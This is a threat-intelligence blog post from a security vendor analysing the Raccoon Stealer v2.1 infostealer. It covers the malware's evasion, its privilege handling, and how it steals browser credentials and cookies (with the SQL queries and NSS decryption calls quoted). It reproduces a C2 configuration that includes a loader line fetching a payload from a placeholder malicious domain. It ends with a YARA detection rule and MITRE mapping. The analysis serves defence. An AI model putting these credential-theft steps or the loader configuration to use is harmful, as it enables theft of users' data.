What We Do
How We Do
Resources
Company
Partners
Apply to become an e3 ecosystem partner with eSentire, the Authority in Managed Detection and Response.
Login to the Partner Portal for resources and content for current partners.
Get Started
Blog

eSentire Threat Intelligence Malware Analysis: Raccoon Stealer v2, Part 2

BY eSentire Threat Response Unit (TRU)

August 3, 2023 | 14 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin

Want to learn more on how to achieve Cyber Resilience?

TALK TO AN EXPERT

IN THIS POST

In August 2022, the eSentire Threat Response Unit (TRU) team released a blog providing a brief overview of the new Raccoon Stealer version 2. In the previous blog, we mentioned the loss of the lead developer for the stealer; he was also believed to be responsible for critical operations within the stealer’s functionality. In 2023, TRU has continued to observe Raccoon Stealer v2 incidents, specifically targeting manufacturing and software industries.

This malware analysis delves deeper into the technical details of how the Raccoon Stealer malware operates and our security recommendations to protect your organization from being exploited.

Key Takeaways

  • Raccoon Stealer is still being actively maintained and developed.
  • The latest versions have changed the string encryption from RC4 to XOR.
  • The stealer added the feature to exfiltrate data from Signal Messenger.

Case Study Raccoon Stealer 2.0

On November 2021, Mark Sokolovsky, a Ukrainian national, was charged in an International Cybercrime Operation related to Raccoon Infostealer operations. According to the U.S. Department of Justice (DOJ), Mark used pseudonyms such as raccoonstealer, Photix, and black21jack77777 on forums.

According to KrebsOnSecurity, the leading developer of the stealer made a mistake by linking his Gmail account, under the nickname 'Photix' on a cybercrime forum, to an iCloud account, thereby exposing his real identity. United States Department of Justice launched a website where users can check whether their emails have been stolen by the stealer.

On March 25th, 2022, Raccoon Stealer stopped its operations, aligning with the timeline of Mark’s arrest. However, during the period of absence, Raccoon Stealer continued to undergo active development. On June 1, 2022, Raccoon Stealer resumed its operations and released the beta version of Raccoon Stealer 2.0. Currently, Raccoon Stealer remains active, with more members added to their support team.

In 2023, eSentire’s Threat Response Unit (TRU) has continued to observe Raccoon Stealer v2 incidents, specifically targeting manufacturing and software industries.

On February the 2nd, 2023, Raccoon Stealer officially exited Beta testing and announced the release of Raccoon Stealer v.2.1 (Figure 1).

Figure 1: Raccoon Stealer v.2.1 release announcement


The updated version includes features such as Signal Messenger data collection, cleaning from Defender detection (likely changing the code, obfuscation to avoid detections), and auto brute-forcing for cryptowallets (Figure 2).

Figure 2: Raccoon Stealer v.2.1 update

Raccoon Stealer 2.1 Analysis

Compared to the previous version, the panel is slightly updated. Now the configuration includes the ability to enable Discord and Signal data staging (Figure 3).

Figure 3: Configuration tab


The builder can be generated as an exe or DLL. The DLL runs with an ordinal #1 or “_Start@16”. The original name you can find in the Raccoon Stealer v2.1 DLL binary is “Raccoon-2.dll” (Figure 4).

Figure 4: Reference to Raccoon-2.dll


We were able to retrieve 62 samples containing DLL payloads on VirusTotal. The signers being used on the DLL payloads were:

  • Encor Burn Inc.
  • behind[.]com
  • ferret[.]com
  • so[.]com
  • www.severe[.]com
  • www.whirlwind[.]com
  • www.bias[.]com
  • www.labourer[.]com
  • www.intensity[.]com
  • www.family[.]com
  • www.divorce[.]com
  • www.football[.]com
  • www.refectory[.]com
  • www.barium[.]com
  • www.piglet[.]com
  • www.phrase[.]com
  • www.behold[.]com
  • www.alcove[.]com
  • www.titanium[.]com
  • www.though[.]com
  • www.salute[.]com
  • www.absorb[.]com
  • www.nimble[.]com
  • www.cooked[.]com
  • www.whirlwind[.]com
  • ANLBO MO.
  • www.pheasant[.]com
  • www.handicap[.]com
  • www.birdbath[.]com
  • www.cannibal[.]com
  • www.pentagon[.]com

For this blog, we analyzed Raccoon Stealer build (2.1.0-4.exe), MD5: 59b3f1bab2aee7c6ded44ab444c93d6b. Unlike other stealers such as Aurora Stealer, Raccoon Stealer is only capable of generating 32-bit builds.

The latest build of Raccoon Stealer uses the XOR encryption algorithm instead of RC4 (Figure 5).

Figure 5: Previous versions of Raccoon Stealer v2 using RC4


Each string is encrypted with a different XOR key. The XOR function loops through each byte in the data list and XORs it with the corresponding byte in the key list. If the data is shorter than the key, it will wrap around to the beginning of the data and continue XORing with bytes from there (Figure 6).

Figure 6: XOR encrypted strings


Figure 7: XOR decryption function


The latest versions of Racoon Stealer use API hammering technique to evade detections and hinder the analysis by researchers. In the API hammering technique, the stealer repeatedly calls a single API function (e.g., PathIsSlowW, RealDriveType) in a tight loop, causing a high volume of calls to that function. This can cause the behavior of the malware to be overlooked or obscured by legitimate API calls, making it more difficult to detect the malicious code, which can be blended in within the API loop. We can use this script written by a Security Researcher at RecordedFuture to erase the API calls whose counts exceeds 400.

Figure 8: Number of calls used by Raccoon Stealer for API hammering


Figure 9: The code blended in within the garbage API calls


The function shown below (Figure 10) is responsible for loading functions using GetProcAddress from a DLL library at runtime.

Figure 10: Loading API functions at a runtime


The stealer looks for the presence of the mutex “AYAYAYAY1337,” and if the string is found, the stealer exits; this is done to ensure that only one instance of the stealer is running on the system. The mutex string correlates with the user-agent string found within the traffic capture (Figure 11).

Figure 11: Mutex check/creation


The stealer checks if the current process is running under Local System privileges (Figure 12). The SID can be retrieved from the GetTokenInformation function, specifically the TOKEN_USER structure (TokenUser). The binary then compares the retrieved SID with SID S-1-5-18 (SYSTEM account).

The TOKEN_USER structure:

typedef struct _TOKEN_USER {
  SID_AND_ATTRIBUTES User;
} TOKEN_USER, *PTOKEN_USER;
Figure 12: Function that checks for the local system privileges for the current running process


If the current running process has local system privileges, the stealer searches for a process with the name explorer.exe, obtains its access token, duplicates it, and then uses that token to create a new process with the same access rights as the original process (Local System privileges), this is possibly implemented for privilege elevation purposes (Figure 13).

Figure 13: Process creation using the access token of an explorer.exe


The MachineGuid is obtained from the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, the GUID is then added to the “System Info” text file as a part of the User ID in the exfiltrated logs (Figure 14).

Figure 14: Obtaining MachineGuid via a registry key


As an example of parsing the browsing data, the stealer retrieves information about the cookies stored in cookies.sqlite database file in Firefox, including:

The function below is responsible for getting the path of the formhistory.sqlite file within Firefox, then it attempts to copy the file into AppData/LocalLow folder under a randomly generated name (Figure 15 & Figure 16). The function that randomly generates the filename is using the SystemFunction036 function, taking 12 characters as the size for the name. If it fails to copy or read the file – it deletes it.

Figure 15: Parsing the cookies from Firefox


Figure 16: Function that generates the random filename


The SQL database is accessed via the sqlite3_open16 function provided by the SQLite library. Then the sqlite3_prepare_v2 is called out to prepare an SQL statement to be executed by SQLite, which in our case is “SELECT host, path, isSecure, expiry, name, value FROM moz_cookies”.

The SQL query is used to retrieve data from the “moz_cookies” table in Firefox’s cookies database. This query selects the columns “host”, “path”, “isSecure”, “expiry”, “name”, and “value” for all rows in the table. This data includes information about website domains, the paths of web pages, whether the cookie is secure or not, the expiration time of the cookie, and the cookie name and value.

The stealer performs similar operation with extracting the encrypted credentials from the perspective of copying the logins.json file into the AppData/LocalLow folder.

encryptedUsername, encryptedPassword, guid, httpRealm, and hostname are the values in the logins.json file that the stealer is looking for, shown below in Figure 17.

Figure 17: Snippet of the code responsible for copying the logins.json file


If the file can be copied, the stealer reads the content of the copied file and attempts to decrypt the encrypted passwords using the functions from the Mozilla NSS library.

In short, this is how the password and username decryption work based on the decompiled code: the binary obtains the internal key slot using the PK11_GetInternalKeySlot function. This function is used to obtain a handle to the internal key slot. The key slot is used to store cryptographic keys that are used to encrypt and decrypt data.

The PK11_Authenticate function is then called to authenticate the key slot. This function is used to verify that the application is authorized to use the key stored in the slot. PK11SDR_Decrypt is used to decrypt data using the key stored in the key slot. The function takes as input the encrypted data, a pointer to the decrypted data buffer, the length of the decrypted data buffer, and the encryption algorithm and mode to use for decryption (Figure 18).

Figure 18: logins.json decryption function


After successfully decrypting the encrypted data, the username and password are parsed in the format:

URL: <URL>
USR: <Username>
PASS: <Password>
Figure 19: Parsing the decrypted data


The same operation is done with the browsing history – the file is copied into AppData/LocalLow. The history is extracted via the “SELECT fieldname, value FROM moz_formhistory” SQL query (Figure 20).

Figure 20: Extracting the browsing history


The function below retrieves autofill data via the SQL query “SELECT name, value FROM autofill” (Figure 21).

Figure 21: Retrieving autofill data


The snippet below copies the prefs.js to an AppData\LocalLow folder and looks for the MetaMask browser extension reference within the copied prefs.js file (a preference file that also includes settings and preferences for any add-ons or extensions installed in the browser). It then accesses the storage\default path to extract the MetaMask data within the IDB folder (Figures 22 - 23).

Figure 22: MetaMask extension enumeration (1)


Figure 23: MetaMask extension enumeration (2)


The stealer gets the list of the installed applications by accessing the registry key "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", specifically the DisplayName key (Figure 24).

Figure 24: Retrieving installed applications


Figure 25: Retrieving display devices


The stealer also retrieves the number of processors on the infected machine and writes it to a “System Info” file using the format “- CPU: %s (%d cores)”, where %s represents the processor name and %d is the number of cores (Figure 26).

Figure 26: Retrieving processor’s information


The information on the version of the Windows operating system is obtained by accessing the registry key "SOFTWARE\Microsoft\Windows NT\CurrentVersion", specifically the key “ProductName”. The result is written to the “System Info” file under “OS: “, shown in Figure 27 below.

Figure 27: Retrieving OS information


This code below checks if the operating system is 64-bit or 32-bit and adds the result to a string “Architecture: “. It sets v1 to 1 if the OS is 64-bit, which means that the binary was able to retrieve the path of the system directory used by WOW64 (the directory is not present on 32-bit systems), and 0 otherwise (Figure 28).

Figure 28: Checking for the system architecture


The time zone information is retrieved via the API GetTimeZoneInformation. The system locale is obtained via GetLocaleInfoW and GetUserDefaultLCID functions, system's RAM (Random Access Memory) is obtained via the GlobalMemoryStatusEx function.

C2 Communication

In the previous blog, we described how Raccoon Stealer transmits data to the C2 channel.

The stealer configuration can be observed in the traffic capture (Figure 29).

scrnsht_Screenshot.jpeg:1 (Screenshot capture enabled)

tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps* (Telegram data)

sgnl_Signal:Signal|*|stickers.*,*cache*,*Cache*,*.exe (Signal Messenger data)

dscrd_Discord:discord\Local Storage\leveldb|*.log,*.ldb|- (Discord data)

grbr_Desktop:%USERPROFILE%\Desktop\|*.txt|*windows*, *recycle|100|1|1|files (Configuration of the Grabber module where 100 is the maximum file size in KB to grab, 1 – recursive search enabled, 1 – shortcuts enabled)

ldr_2: https://<malicious.domain> /payload.dll|%APPDATA%|dll (Example of the Loader module configuration including the folder where the secondary file is dropped and the extension of the file)

Figure 29: Example of the traffic capture


As we can see, apart from the Signal data exfiltration, API hammering, and XOR encryption, there are no significant updates in the newest build. However, the stealer is still under active development and support.

We wrote the C2 and the mutex extractor for the latest Raccoon Stealer build and the IDAPython script to decrypt the encrypted strings.

Recommendations from eSentire's Threat Response Unit (TRU)

We recommend implementing the following controls to help secure your organization against Raccoon Stealer malware: 

While the TTPs used by threat actor(s) grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack technique and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detections, and the ability to investigate logs & network data during active intrusions. 

eSentire TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.  

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption. Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist. 

Yara rule

rule RaccoonStealerv2 {
    meta:
        author = "eSentire Threat Intelligence team"
        date = "04/17/2023"
        description = "Detects the latest unpacked/unobfuscated build 2.1.0-4"
    strings:
        $pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8}
        $pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00}
        $pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00}
        $m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00}
        $m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00}
    condition:
        2 of ($pattern*) and uint16(0) == 0x5A4D and 1 of ($m*) and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB
}

The payloads with the latest build can be obtained here.

MITRE ATT&CK

MITRE ATT&CK Tactic

ID

MITRE ATT&CK Technique

Description

MITRE ATT&CK Tactic

Initial Access

ID

T1189

MITRE ATT&CK Technique

Drive-By Compromise

Description

Raccoon Stealer is delivered via malicious websites hosting fake cracked or pirated software e

MITRE ATT&CK Tactic

User Execution

ID

T1204.002

MITRE ATT&CK Technique

Malicious File

Description

The user launches the malicious file

MITRE ATT&CK Tactic

Credential Access

ID

T1555
T1555.003

MITRE ATT&CK Technique

Credentials from Password Stores
Credentials from Password Stores:
Credentials from Web Browsers

Description

Raccoon Stealer steals sensitive data from browsers including credentials, cookies, and saved credit cards.

MITRE ATT&CK Tactic

Discovery

ID

T1033
T1518
T1057
T1614.001
T1082

MITRE ATT&CK Technique

System Owner/User Discovery
Software Discovery
Process Discovery
System Location Discovery: System Language Discovery
System Information Discovery

Description

The stealer enumerates the host for the username and hardware information, running processes and installed applications as well as keyboard and display languages

MITRE ATT&CK Tactic

Collection

ID

T1113

MITRE ATT&CK Technique

Screen Capture

Description

If the option is enabled, the stealer takes the screenshot from the infected machine and sends it to the C2

MITRE ATT&CK Tactic

Exfiltration

ID

T1020

MITRE ATT&CK Technique

Automated Exfiltration

Description

The stealer automatically exfiltrates the gathered files to C2, some file-grabbing options can be customized by an attacker

MITRE ATT&CK Tactic

Access Token Manipulation

ID

T1134
T1134.002

MITRE ATT&CK Technique

Create Process with Token

Description

Raccoon Stealer is capable of creating a new process with elevated privileges

References

eSentire Threat Response Unit (TRU)
eSentire Threat Response Unit (TRU)

Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers, that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our Atlas XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.

Read the Latest from eSentire